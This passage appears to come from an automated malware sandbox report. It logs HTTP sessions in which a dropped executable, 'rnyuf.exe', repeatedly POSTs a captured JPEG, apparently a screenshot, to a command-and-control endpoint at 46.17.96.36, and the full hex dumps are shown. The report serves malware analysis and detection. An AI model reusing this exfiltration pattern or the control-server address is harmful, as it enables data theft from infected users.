                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:34.202125072 CEST6981OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:34.202178001 CEST6984OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:34.202192068 CEST6989OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:34.202214956 CEST6999OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:34.202342987 CEST7004OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:34.235582113 CEST7007OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:34.235955000 CEST7009OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:34.340368032 CEST7074INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:34 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        54192.168.2.44979246.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:34.557521105 CEST7075OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9
                                        Host: 46.17.96.36
                                        Content-Length: 107971
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:34.557717085 CEST7075OUTData Raw: 2d 2d 2d 2d 2d 2d 37 32 61 62 31 30 35 61 36 36 39 66 37 63 63 32 66 66 65 38 34 65 62 38 37 37 31 39 34 34 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------72ab105a669f7cc2ffe84eb8771944d9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:34.557940006 CEST7085OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:34.558062077 CEST7088OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:34.592124939 CEST7101OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:34.592165947 CEST7113OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:27:34.624927044 CEST7119OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:34.624989033 CEST7127OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:34.625168085 CEST7129OUTData Raw: 56 1d 46 29 a0 8f 5a 0b 0f 5a 61 61 c6 9b 46 45 19 a5 74 00 69 28 26 90 9a 40 38 53 c5 30 1a 76 6a 93 13 40 7a d1 de 90 9a 33 9a 00 53 47 6a 05 14 08 51 4b 8a 07 34 13 8a a0 0a 5f 7a 40 68 cd 02 b0 f1 4b 4d 07 9a 75 32 42 90 d2 d0 69 80 83 a5 2e
                                        Data Ascii: VF)ZZaaFEti(&@8S0vj@z3SGjQK4_z@hKMu2Bi.(P1NP)uJdZ`(65DfNM>0R(Jh;u4pxBcRzEM"e4`GqC;S39,>L2,:4
                                        Aug 29, 2021 22:27:34.625195026 CEST7140OUTData Raw: 15 98 de 31 f0 af f0 db de d4 2d e3 2f 0d 76 86 f6 ba 15 54 fa 33 95 e1 2a 2e c6 e0 60 7b d1 91 5c f1 f1 9f 87 fb 45 79 4d 3e 33 d0 87 48 ee ff 00 4a 7c eb b0 be af 50 e9 33 4b 9a e6 7f e1 36 d1 07 fc b2 bb a5 1e 37 d1 47 fc b2 bb a3 99 0d 50 a9
                                        Data Ascii: 1-/vT3*.`{\EyM>3HJ|P3K67GP8\'Z0W_/'z?hnJW4TuDxIwC)SO5?64QhE<W>#ic]n1K'Ks}i3W3LsQ;LuVhW
                                        Aug 29, 2021 22:27:34.625242949 CEST7150OUTData Raw: ff 00 0a eb c5 7e 5e 7c cf 9f 6e 3a e7 ca 38 a8 aa b9 92 5e 66 94 e5 ca db 3b 78 8d ff 00 8e ae 25 95 6e e6 b1 d0 23 72 91 88 4e d9 2e 48 ea 49 ec 3f cf 5a 98 78 0b c3 6c cc 96 93 4d 0d d2 7f cb 48 6e 89 91 4f af 7f e5 4e b1 f3 bf e1 56 47 fd 97
                                        Data Ascii: ~^|n:8^f;x%n#rN.HI?ZxlMHnONVG?'gwc9ktBg>c?s]49*rQv:9]H9+Gh+_SAJ\8%_oGZ(1ATY%oW/,98]?R,'{5
                                        Aug 29, 2021 22:27:34.731270075 CEST7184INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:34 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        55192.168.2.44979346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:34.969371080 CEST7185OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9
                                        Host: 46.17.96.36
                                        Content-Length: 107971
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:34.969502926 CEST7185OUTData Raw: 2d 2d 2d 2d 2d 2d 37 32 61 62 31 30 35 61 36 36 39 66 37 63 63 32 66 66 65 38 34 65 62 38 37 37 31 39 34 34 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------72ab105a669f7cc2ffe84eb8771944d9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:34.969680071 CEST7195OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:34.969887972 CEST7198OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:35.007803917 CEST7201OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:35.008150101 CEST7206OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:27:35.008423090 CEST7218OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:35.008488894 CEST7223OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:35.045835018 CEST7229OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:35.045876026 CEST7231OUTData Raw: 54 8e cc dc 87 52 90 74 94 fe 75 a3 06 ab 70 3f e5 a9 35 ca 23 94 61 5a 76 ce 49 ae 5a b8 78 5b 63 d1 c3 63 6a 37 6b 9d 47 88 27 79 bc 15 23 b7 52 6b c7 e5 3f 31 af 56 d7 1f 1e 03 6f f7 ab c9 64 ea 69 65 8a d4 e5 ea 77 e3 f5 ab 16 fb 23 da 74 67
                                        Data Ascii: TRtup?5#aZvIZx[ccj7kG'y#Rk?1Vodiew#tg<J):\P3EgyWNO;Qdoi_qT=iv_FL.PR_^Ei%CVUR[.},s2hwalT-a:pcqWdTSin$<
                                        Aug 29, 2021 22:27:35.045891047 CEST7239OUTData Raw: e1 0a 50 29 45 2d 32 4b 3a 7b 2c 57 d1 bb b0 55 19 c9 3f 43 5d 64 37 b7 97 1a 7b da c1 73 3c b6 48 c1 de 24 90 98 d5 8f 42 40 e0 1e 0f 3e d5 c4 9a ed be 1e fc 41 ff 00 84 13 fb 47 fe 25 7f 6e fb 6f 95 ff 00 2f 1e 56 cd 9b ff 00 d9 6c e7 7f b7 4a
                                        Data Ascii: P)E-2K:{,WU?C]d7{s<H$B@>AG%no/VlJ)j:QI/ntMb^.$N\E:x|nTc#RIUZcN1s^jay'P{l3xD!|8;RIU
                                        Aug 29, 2021 22:27:35.155793905 CEST7293INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:35 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        56192.168.2.44979446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:35.712956905 CEST7294OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9
                                        Host: 46.17.96.36
                                        Content-Length: 107971
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:35.713179111 CEST7294OUTData Raw: 2d 2d 2d 2d 2d 2d 37 32 61 62 31 30 35 61 36 36 39 66 37 63 63 32 66 66 65 38 34 65 62 38 37 37 31 39 34 34 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------72ab105a669f7cc2ffe84eb8771944d9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:35.713373899 CEST7304OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:35.713519096 CEST7307OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:35.748197079 CEST7315OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:35.748369932 CEST7327OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:27:35.748461008 CEST7332OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:27:35.783186913 CEST7335OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:27:35.783256054 CEST7358OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:27:35.783294916 CEST7371OUTData Raw: ff 00 0a eb c5 7e 5e 7c cf 9f 6e 3a e7 ca 38 a8 aa b9 92 5e 66 94 e5 ca db 3b 78 8d ff 00 8e ae 25 95 6e e6 b1 d0 23 72 91 88 4e d9 2e 48 ea 49 ec 3f cf 5a 98 78 0b c3 6c cc 96 93 4d 0d d2 7f cb 48 6e 89 91 4f af 7f e5 4e b1 f3 bf e1 56 47 fd 97
                                        Data Ascii: ~^|n:8^f;x%n#rN.HI?ZxlMHnONVG?'gwc9ktBg>c?s]49*rQv:9]H9+Gh+_SAJ\8%_oGZ(1ATY%oW/,98]?R,'{5
                                        Aug 29, 2021 22:27:35.783318996 CEST7374OUTData Raw: a0 ec f9 5e bf f6 fc cc e5 f1 9f 86 ed e0 85 56 ec c7 19 dc ab 18 b5 94 18 c2 05 2d b9 76 e5 00 0c a7 2c 00 c1 15 7e cf c4 3a 66 a1 a9 4d 61 69 3b cd 3c 3f 7c ac 0f e5 8e 01 c7 99 b7 61 38 60 78 3d eb 97 b8 f0 6d f5 b5 cd ad ce 99 73 14 f7 06 19
                                        Data Ascii: ^V-v,~:fMai;<?|a8`x=msBYW(~^?7%5uXTL<h'<9rr_?i<~cS+;v_-(Z{zh5vyVB'%\QL4)EBT!RdP)
                                        Aug 29, 2021 22:27:35.891603947 CEST7401INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:27:35 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        57192.168.2.44979546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:36.140845060 CEST7402OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----72ab105a669f7cc2ffe84eb8771944d9
                                        Host: 46.17.96.36
                                        Content-Length: 107971
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:36.140934944 CEST7402OUTData Raw: 2d 2d 2d 2d 2d 2d 37 32 61 62 31 30 35 61 36 36 39 66 37 63 63 32 66 66 65 38 34 65 62 38 37 37 31 39 34 34 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------72ab105a669f7cc2ffe84eb8771944d9Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:36.141122103 CEST7412OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
